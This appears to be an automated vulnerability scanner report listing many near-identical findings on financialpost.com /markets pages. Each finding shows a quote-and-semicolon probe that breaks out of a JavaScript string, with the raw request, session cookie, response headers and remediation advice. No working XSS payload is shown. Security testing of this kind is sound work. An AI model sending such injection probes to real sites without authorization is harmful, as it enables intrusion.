GET /markets/data90bb7'%3b3637543487d/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:04 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36419
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 219de'%3bb428df72f46 was submitted in the REST URL parameter 1. This input was echoed as 219de';b428df72f46 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets219de'%3bb428df72f46/detail/index.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43312
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b430b'%3b1c037b25630 was submitted in the REST URL parameter 2. This input was echoed as b430b';1c037b25630 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/detailb430b'%3b1c037b25630/index.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43276
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 624ac'%3b26384954959 was submitted in the REST URL parameter 3. This input was echoed as 624ac';26384954959 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/detail/624ac'%3b26384954959 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:39 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43318
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87abb'%3b4fc39ea6f62 was submitted in the REST URL parameter 1. This input was echoed as 87abb';4fc39ea6f62 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets87abb'%3b4fc39ea6f62/funds/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:07 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36474
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a40f3'%3bb938dde38ac was submitted in the REST URL parameter 2. This input was echoed as a40f3';b938dde38ac in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/fundsa40f3'%3bb938dde38ac/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43256
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5926e'%3b02d83b6f42d was submitted in the REST URL parameter 1. This input was echoed as 5926e';02d83b6f42d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets5926e'%3b02d83b6f42d/funds/profile/index.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:04 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43501
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3ad1'%3bf27dab35307 was submitted in the REST URL parameter 2. This input was echoed as f3ad1';f27dab35307 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/fundsf3ad1'%3bf27dab35307/profile/index.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43465
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e927'%3b27cd8eb768f was submitted in the REST URL parameter 3. This input was echoed as 1e927';27cd8eb768f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/funds/profile1e927'%3b27cd8eb768f/index.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43430
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6620c'%3bf0f4d8bb4e8 was submitted in the REST URL parameter 4. This input was echoed as 6620c';f0f4d8bb4e8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/funds/profile/6620c'%3bf0f4d8bb4e8 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43497
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e18f6'%3bf39282e7ad7 was submitted in the REST URL parameter 1. This input was echoed as e18f6';f39282e7ad7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /marketse18f6'%3bf39282e7ad7/futures/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:07 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36515
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c53f'%3b3da8e6e0e07 was submitted in the REST URL parameter 2. This input was echoed as 5c53f';3da8e6e0e07 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/futures5c53f'%3b3da8e6e0e07/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43296
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26105'%3bf9077ffe571 was submitted in the REST URL parameter 1. This input was echoed as 26105';f9077ffe571 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets26105'%3bf9077ffe571/idms-terms.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43169
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74189'%3b8943533dea2 was submitted in the REST URL parameter 2. This input was echoed as 74189';8943533dea2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/74189'%3b8943533dea2 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36339
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 968a1'%3b5e5fba5ddd0 was submitted in the REST URL parameter 1. This input was echoed as 968a1';5e5fba5ddd0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets968a1'%3b5e5fba5ddd0/key-numbers/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:04 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43412
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8136'%3bb70724e675e was submitted in the REST URL parameter 2. This input was echoed as e8136';b70724e675e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/key-numberse8136'%3bb70724e675e/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:14 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43375
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ede9'%3bbdd4c280d2b was submitted in the REST URL parameter 1. This input was echoed as 1ede9';bdd4c280d2b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets1ede9'%3bbdd4c280d2b/news-alerts/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:04 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43411
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49f35'%3b67eccc5e32c was submitted in the REST URL parameter 2. This input was echoed as 49f35';67eccc5e32c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/news-alerts49f35'%3b67eccc5e32c/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:16 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36559
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d964b'%3bf411e228aea was submitted in the REST URL parameter 1. This input was echoed as d964b';f411e228aea in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /marketsd964b'%3bf411e228aea/news/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43272
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16774'%3b529b04d3c55 was submitted in the REST URL parameter 2. This input was echoed as 16774';529b04d3c55 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
